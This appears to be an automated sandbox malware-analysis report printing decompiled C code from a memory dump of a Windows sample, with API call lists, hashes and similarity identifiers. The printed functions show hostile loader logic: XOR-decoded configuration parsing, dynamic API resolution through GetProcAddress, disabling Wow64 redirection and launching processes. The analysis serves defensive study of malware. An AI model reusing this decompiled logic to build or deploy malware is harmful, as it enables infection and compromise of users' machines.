					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0xa7a290, _t107, 0x800);
						if(_t98 != _t107) {
							E00A71A51(GetTickCount());
							_t62 =  *0xa7a37c; // 0x5569630
                                                                                                                                                                                                                                                                                    							__imp__(_t62 + 0x40);
                                                                                                                                                                                                                                                                                    							asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                                                    							_t66 =  *0xa7a37c; // 0x5569630
                                                                                                                                                                                                                                                                                    							__imp__(_t66 + 0x40);
                                                                                                                                                                                                                                                                                    							_t68 =  *0xa7a37c; // 0x5569630
                                                                                                                                                                                                                                                                                    							_t115 = E00A75AE3(1, _t103, _t117,  *_t68);
                                                                                                                                                                                                                                                                                    							asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                                                    							if(_t115 != _t107) {
                                                                                                                                                                                                                                                                                    								StrTrimA(_t115, 0xa792cc);
                                                                                                                                                                                                                                                                                    								_push(_t115);
                                                                                                                                                                                                                                                                                    								_t108 = E00A72829();
                                                                                                                                                                                                                                                                                    								_v4 = _t108;
                                                                                                                                                                                                                                                                                    								if(_t108 != 0) {
                                                                                                                                                                                                                                                                                    									 *_t115 = 0;
                                                                                                                                                                                                                                                                                    									__imp__(_t98, _a8);
                                                                                                                                                                                                                                                                                    									_t109 = __imp__;
                                                                                                                                                                                                                                                                                    									 *_t109(_t98, _t108);
                                                                                                                                                                                                                                                                                    									 *_t109(_t98, _t115);
                                                                                                                                                                                                                                                                                    									_t78 = E00A73B46(0xffffffffffffffff, _t98, _v12, _v8);
                                                                                                                                                                                                                                                                                    									_v40 = _t78;
                                                                                                                                                                                                                                                                                    									if(_t78 != 0 && _t78 != 0x10d2) {
                                                                                                                                                                                                                                                                                    										E00A72813();
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									HeapFree( *0xa7a290, 0, _v24);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								HeapFree( *0xa7a290, 0, _t115);
                                                                                                                                                                                                                                                                                    								_t107 = 0;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							HeapFree( *0xa7a290, _t107, _t98);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						HeapFree( *0xa7a290, _t107, _a20);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					HeapFree( *0xa7a290, _t107, _t117);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                                                                    			}





















































                                                                                                                                                                                                                                                                                    0x00a762ee
                                                                                                                                                                                                                                                                                    0x00a762f4
                                                                                                                                                                                                                                                                                    0x00a76301
                                                                                                                                                                                                                                                                                    0x00a7630e
                                                                                                                                                                                                                                                                                    0x00a76314
                                                                                                                                                                                                                                                                                    0x00a7631c
                                                                                                                                                                                                                                                                                    0x00a76322
                                                                                                                                                                                                                                                                                    0x00a76328
                                                                                                                                                                                                                                                                                    0x00a7632c
                                                                                                                                                                                                                                                                                    0x00a76330
                                                                                                                                                                                                                                                                                    0x00a76336
                                                                                                                                                                                                                                                                                    0x00a7633a
                                                                                                                                                                                                                                                                                    0x00a76341
                                                                                                                                                                                                                                                                                    0x00a76348
                                                                                                                                                                                                                                                                                    0x00a7634c
                                                                                                                                                                                                                                                                                    0x00a76357
                                                                                                                                                                                                                                                                                    0x00a7635e
                                                                                                                                                                                                                                                                                    0x00a76362
                                                                                                                                                                                                                                                                                    0x00a7636b
                                                                                                                                                                                                                                                                                    0x00a7636b
                                                                                                                                                                                                                                                                                    0x00a7637c
                                                                                                                                                                                                                                                                                    0x00a7637c
                                                                                                                                                                                                                                                                                    0x00a7638b
                                                                                                                                                                                                                                                                                    0x00a76391
                                                                                                                                                                                                                                                                                    0x00a76391
                                                                                                                                                                                                                                                                                    0x00a7639b
                                                                                                                                                                                                                                                                                    0x00a7639b
                                                                                                                                                                                                                                                                                    0x00a763ac
                                                                                                                                                                                                                                                                                    0x00a763ac
                                                                                                                                                                                                                                                                                    0x00a763ba
                                                                                                                                                                                                                                                                                    0x00a763ba
                                                                                                                                                                                                                                                                                    0x00a763ca

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00A76142
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00A76156
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A761A5
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A761C2
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A761E3
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A76201
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A76216
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A76237
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A76271
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A76291
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A762AC
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00A762BC
                                                                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(055695F0), ref: 00A762D0
                                                                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(055695F0), ref: 00A762EE
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00A76301,00000000,05569630), ref: 00A75B0E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75AE3: lstrlen.KERNEL32(00000000,?,00000000,00A76301,00000000,05569630), ref: 00A75B16
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75AE3: strcpy.NTDLL ref: 00A75B2D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75AE3: lstrcat.KERNEL32(00000000,00000000), ref: 00A75B38
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00A76301,?,00000000,00A76301,00000000,05569630), ref: 00A75B55
                                                                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,00A792CC,00000000,05569630), ref: 00A7631C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72829: lstrlen.KERNEL32(0556887A,00000000,00000000,00000000,00A76328,00000000), ref: 00A72839
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72829: lstrlen.KERNEL32(?), ref: 00A72841
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72829: lstrcpy.KERNEL32(00000000,0556887A), ref: 00A72855
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72829: lstrcat.KERNEL32(00000000,?), ref: 00A72860
                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00A7633A
                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00A76348
                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00A7634C
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00A7637C
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00A7638B
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000,05569630), ref: 00A7639B
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 00A763AC
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 00A763BA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                                                                                                                                                                                                                                                                    • String ID: va\x
                                                                                                                                                                                                                                                                                    • API String ID: 1837416118-1859480093
                                                                                                                                                                                                                                                                                    • Opcode ID: 804db5ac5d5d2b5161c94fcd745e87279956b8ecabf38579693528063c19db43
                                                                                                                                                                                                                                                                                    • Instruction ID: 5843a480620e62e14a579ebdb262d65e48656ceca90343cb3e478acee72fc090
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 804db5ac5d5d2b5161c94fcd745e87279956b8ecabf38579693528063c19db43
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22718FB2500604BFD711DBA8EC88E9B77ECEB98310B15C515F94DC7221D636A886CBA2
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 27%
                                                                                                                                                                                                                                                                                    			E00A7762C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				long _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				long _t43;
                                                                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                                                                    				intOrPtr _t54;
                                                                                                                                                                                                                                                                                    				intOrPtr _t57;
                                                                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                                                                    				void* _t60;
                                                                                                                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                                                                                                                    				intOrPtr _t79;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t80;
                                                                                                                                                                                                                                                                                    				intOrPtr _t91;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t79 =  *0xa7a38c; // 0x5569ca8
                                                                                                                                                                                                                                                                                    				_v24 = 8;
                                                                                                                                                                                                                                                                                    				_t43 = GetTickCount();
                                                                                                                                                                                                                                                                                    				_push(5);
                                                                                                                                                                                                                                                                                    				_t74 = 0xa;
                                                                                                                                                                                                                                                                                    				_v16 = _t43;
                                                                                                                                                                                                                                                                                    				_t44 = E00A75F43(_t74,  &_v16);
                                                                                                                                                                                                                                                                                    				_v8 = _t44;
                                                                                                                                                                                                                                                                                    				if(_t44 == 0) {
                                                                                                                                                                                                                                                                                    					_v8 = 0xa791cc;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t46 = E00A743FD(_t79);
                                                                                                                                                                                                                                                                                    				_v12 = _t46;
                                                                                                                                                                                                                                                                                    				if(_t46 != 0) {
                                                                                                                                                                                                                                                                                    					_t80 = __imp__;
                                                                                                                                                                                                                                                                                    					_t48 =  *_t80(_v8, _t71);
                                                                                                                                                                                                                                                                                    					_t49 =  *_t80(_v12);
                                                                                                                                                                                                                                                                                    					_t50 =  *_t80(_a4);
                                                                                                                                                                                                                                                                                    					_t54 = E00A75C4E(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                                                                                                                                                                                                                                                    					_v20 = _t54;
                                                                                                                                                                                                                                                                                    					if(_t54 != 0) {
                                                                                                                                                                                                                                                                                    						_t75 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    						_t16 = _t75 + 0xa7bad8; // 0x530025
                                                                                                                                                                                                                                                                                    						 *0xa7a13c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                                                                                                                                                                                                                                                    						_push(4);
                                                                                                                                                                                                                                                                                    						_t77 = 5;
                                                                                                                                                                                                                                                                                    						_t57 = E00A75F43(_t77,  &_v16);
                                                                                                                                                                                                                                                                                    						_v8 = _t57;
                                                                                                                                                                                                                                                                                    						if(_t57 == 0) {
                                                                                                                                                                                                                                                                                    							_v8 = 0xa791d0;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t58 =  *_t80(_v8);
                                                                                                                                                                                                                                                                                    						_t59 =  *_t80(_v12);
                                                                                                                                                                                                                                                                                    						_t60 =  *_t80(_a4);
                                                                                                                                                                                                                                                                                    						_t91 = E00A75C4E(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                                                                                                                                                                                                                                                    						if(_t91 == 0) {
                                                                                                                                                                                                                                                                                    							E00A72A03(_v20);
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t66 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    							_t31 = _t66 + 0xa7bbf8; // 0x73006d
                                                                                                                                                                                                                                                                                    							 *0xa7a13c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                                                                                                                                                                                                                                                    							 *_a16 = _v20;
                                                                                                                                                                                                                                                                                    							_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                                                    							 *_a20 = _t91;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00A72A03(_v12);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v24;
                                                                                                                                                                                                                                                                                    			}





























APIs
• GetTickCount.KERNEL32 ref: 00A77641
• lstrlen.KERNEL32(?,80000002,00000005), ref: 00A77681
• lstrlen.KERNEL32(00000000), ref: 00A7768A
• lstrlen.KERNEL32(00000000), ref: 00A77691
• lstrlenW.KERNEL32(80000002), ref: 00A7769E
• lstrlen.KERNEL32(?,00000004), ref: 00A776FE
• lstrlen.KERNEL32(?), ref: 00A77707
• lstrlen.KERNEL32(?), ref: 00A7770E
• lstrlenW.KERNEL32(?), ref: 00A77715
  • Part of subcall function 00A72A03: HeapFree.KERNEL32(00000000,00000000,00A74072,00000000,?,?,00000000,?,?,?,?,?,?,00A744AE,00000000), ref: 00A72A0F
Memory Dump Source
• Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
Similarity
• API ID: lstrlen$CountFreeHeapTick
• String ID:
• API String ID: 2535036572-0
• Opcode ID: 308671d3f8fee26c6f231399e07e3d15695e4e03f3d18f126e66e64ae8aaa345
• Instruction ID: e5ed9ff7f3bcdd06486a783d9b56db7e0d4a6030c384878572d2f4714ea11454
• Opcode Fuzzy Hash: 308671d3f8fee26c6f231399e07e3d15695e4e03f3d18f126e66e64ae8aaa345
• Instruction Fuzzy Hash: C6412472D00219BBCF11AFA4CD09A9EBBB5EF48344F058095E908A7222D7359A65EB90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 61%
E00A77836(void* __eax, void* __ecx) {
	long _v8;
	void* _v12;
	void* _v16;
	void* _v28;
	long _v32;
	void _v104;
	char _v108;
	long _t39;
	intOrPtr _t43;
	intOrPtr _t50;
	void* _t52;
	intOrPtr _t53;
	void* _t61;
	intOrPtr* _t66;
	intOrPtr* _t73;
	intOrPtr* _t76;

	_t1 = __eax + 0x14; // 0x74183966
	_t71 =  *_t1;
	_t39 = E00A771A3(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
	_v8 = _t39;
	if(_t39 != 0) {
		L12:
		return _v8;
	}
	E00A77973( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
	_t43 = _v12(_v12);
	_v8 = _t43;
	if(_t43 == 0 && ( *0xa7a2b8 & 0x00000001) != 0) {
		_v32 = 0;
		asm("stosd");
		asm("stosd");
		asm("stosd");
		_v108 = 0;
		memset( &_v104, 0, 0x40);
		_t50 =  *0xa7a2d0; // 0x4aed5a8
		_t18 = _t50 + 0xa7b55b; // 0x73797325
		_t52 = E00A71000(_t18);
		_v12 = _t52;
		if(_t52 == 0) {
			_v8 = 8;
		} else {
			_t53 =  *0xa7a2d0; // 0x4aed5a8
			_t20 = _t53 + 0xa7b73d; // 0x5568ce5
			_t21 = _t53 + 0xa7b0af; // 0x4e52454b
			_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
			if(_t66 == 0) {
				_v8 = 0x7f;
			} else {
				_t73 = __imp__;
				_v108 = 0x44;
				 *_t73(0);
				_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
				 *_t73(1);
				if(_t61 == 0) {
					_v8 = GetLastError();
				} else {
					CloseHandle(_v28);
					CloseHandle(_v32);
				}
			}
			HeapFree( *0xa7a290, 0, _v12);
		}
	}
	_t76 = _v16;
	 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
	E00A72A03(_t76);
	goto L12;
}


                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A771A3: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00A77852,?,?,?,?,00000000,00000000), ref: 00A771C8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A771A3: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A771EA
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A771A3: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A77200
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A771A3: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A77216
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A771A3: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A7722C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A771A3: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A77242
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 00A778A0
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00A74F1C,73797325), ref: 00A71011
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A7102B
                                                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(4E52454B,05568CE5,73797325), ref: 00A778D7
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00A778DE
                                                                                                                                                                                                                                                                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00A778F8
                                                                                                                                                                                                                                                                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00A77916
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A77925
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00A7792A
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A7792E
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 00A7794A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 91923200-0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                    			E00A7374B(int* __ecx) {
                                                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				signed int _t20;
                                                                                                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                                                                                                    				char* _t31;
                                                                                                                                                                                                                                                                                    				char* _t32;
                                                                                                                                                                                                                                                                                    				char* _t33;
                                                                                                                                                                                                                                                                                    				char* _t34;
                                                                                                                                                                                                                                                                                    				char* _t35;
                                                                                                                                                                                                                                                                                    				void* _t36;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				void* _t46;
				void* _t47;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				void* _t74;
				intOrPtr _t90;

				_t75 = __ecx;
				_t20 =  *0xa7a2cc; // 0x63699bc3
				if(E00A73D6B( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x110) {
					 *0xa7a320 = _v12;
				}
				_t25 =  *0xa7a2cc; // 0x63699bc3
				if(E00A73D6B( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t74 = _v12;
					if(_t74 == 0) {
						_t31 = 0;
					} else {
						_t69 =  *0xa7a2cc; // 0x63699bc3
						_t31 = E00A7257B(_t75, _t74, _t69 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0xa7a298 = _v8;
						}
					}
					if(_t74 == 0) {
						_t32 = 0;
					} else {
						_t65 =  *0xa7a2cc; // 0x63699bc3
						_t32 = E00A7257B(_t75, _t74, _t65 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0xa7a29c = _v8;
						}
					}
					if(_t74 == 0) {
						_t33 = 0;
					} else {
						_t61 =  *0xa7a2cc; // 0x63699bc3
						_t33 = E00A7257B(_t75, _t74, _t61 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0xa7a2a0 = _v8;
						}
					}
					if(_t74 == 0) {
						_t34 = 0;
					} else {
						_t57 =  *0xa7a2cc; // 0x63699bc3
						_t34 = E00A7257B(_t75, _t74, _t57 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0xa7a004 = _v8;
						}
					}
					if(_t74 == 0) {
						_t35 = 0;
					} else {
						_t53 =  *0xa7a2cc; // 0x63699bc3
						_t35 = E00A7257B(_t75, _t74, _t53 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0xa7a02c = _v8;
						}
					}
					if(_t74 == 0) {
						_t36 = 0;
					} else {
						_t49 =  *0xa7a2cc; // 0x63699bc3
						_t36 = E00A7257B(_t75, _t74, _t49 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t46 = 0x10;
						_t47 = E00A75A4E(_t46);
						if(_t47 != 0) {
							_push(_t47);
							E00A7461D();
						}
					}
					if(_t74 == 0) {
						_t37 = 0;
					} else {
						_t44 =  *0xa7a2cc; // 0x63699bc3
						_t37 = E00A7257B(_t75, _t74, _t44 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E00A75A4E(0, _t37) != 0) {
						_t90 =  *0xa7a37c; // 0x5569630
						E00A76027(_t90 + 4, _t42);
					}
					_t38 =  *0xa7a2d0; // 0x4aed5a8
					_t18 = _t38 + 0xa7b2d2; // 0x556887a
					_t19 = _t38 + 0xa7b7c4; // 0x6976612e
					 *0xa7a31c = _t18;
					 *0xa7a390 = _t19;
					HeapFree( *0xa7a290, 0, _t74);
					L48:
					return 0;
				}
			}


                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,00A72F44,?,00A72F44,63699BC3,?,00A72F44,63699BC3,E8FA7DD7,00A7A00C,745EC740,?,?,00A72F44), ref: 00A737D0
                                                                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,00A72F44,?,00A72F44,63699BC3,?,00A72F44,63699BC3,E8FA7DD7,00A7A00C,745EC740,?,?,00A72F44), ref: 00A73802
                                                                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,00A72F44,?,00A72F44,63699BC3,?,00A72F44,63699BC3,E8FA7DD7,00A7A00C,745EC740,?,?,00A72F44), ref: 00A73834
                                                                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,00A72F44,?,00A72F44,63699BC3,?,00A72F44,63699BC3,E8FA7DD7,00A7A00C,745EC740,?,?,00A72F44), ref: 00A73866
                                                                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,00A72F44,?,00A72F44,63699BC3,?,00A72F44,63699BC3,E8FA7DD7,00A7A00C,745EC740,?,?,00A72F44), ref: 00A73898
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,00A72F44,63699BC3,?,00A72F44,63699BC3,E8FA7DD7,00A7A00C,745EC740,?,?,00A72F44), ref: 00A73934
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 762d69ff403b922cde99da74aaa91bc7595bb0675f7cfdf42e542defefed4295
                                                                                                                                                                                                                                                                                    • Instruction ID: 60def94ef830275e8c959530512f0d73552fbb488ff67da4a79669e22723dfd6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 762d69ff403b922cde99da74aaa91bc7595bb0675f7cfdf42e542defefed4295
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC51D1B2A10104BACF10DBF9DD85CAF77EDAB98700725C925B40DD7225E631DF42AB62
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00A72C4F
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(0070006F), ref: 00A72C63
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00A72C75
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00A72CD9
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00A72CE8
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00A72CF3
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
